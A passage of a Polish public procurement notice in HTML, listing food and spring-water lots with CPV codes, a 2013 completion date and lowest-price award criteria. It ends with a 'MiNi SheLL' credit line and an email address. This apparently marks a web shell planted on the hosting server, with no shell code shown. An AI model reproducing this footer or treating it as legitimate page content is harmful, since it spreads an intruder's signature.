Cukierki  mini -wieloowocowe ,oddzielnie pakowane	Kg	10
Herbatniki kruche w kartonach-   2, 80 kg	kg	28
Krem czekoladowo - orzechowy do smarowani typu nutella
  750 g	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana, niegazowana, butle o pojemności ok. 19 hermetyczne  zamykana	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com